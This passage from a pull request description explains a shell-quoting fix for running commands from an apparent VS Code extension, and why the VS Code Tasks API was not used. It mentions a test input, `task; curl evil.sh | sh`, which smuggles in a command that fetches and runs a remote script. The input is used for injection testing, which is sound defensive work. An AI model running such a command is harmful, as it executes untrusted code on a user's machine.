- [exec-manager.ts](src/core/package/exec-manager.ts): new terminals get their directory via `createTerminal({ cwd })` (native, no shell parsing); reused terminals get a quoted `cd`; the command + args are sent via `quoteCommandLine`.

### Why not the VS Code Tasks API?

An earlier revision of this PR migrated to `ShellExecution` + `ShellQuoting.Strong`. That fixed the quoting but **regressed Python environment activation**: a Tasks-API task terminal does not run the Python extension's env-activation hooks, so the selected interpreter / bare `inspect` command no longer resolves on PATH. Keeping the integrated terminal preserves activation; we just quote correctly.

`runDebugger` is unchanged — it already passes `args` as an array to debugpy, which performs no shell interpretation.

## Verification

`pnpm check` clean (lint + format + typecheck + 450 tests). New `shell-quote` tests cover per-kind quoting, hostile inputs (`task; curl evil.sh | sh`), and shell detection; `buildRunCommand` tests updated for the plain-string shape.

Design notes: [docs/superpowers/specs/2026-06-10-run-command-shell-quoting-design.md](docs/superpowers/specs/2026-06-10-run-command-shell-quoting-design.md)

🤖 Generated with [Claude Code](https://claude.com/claude-code)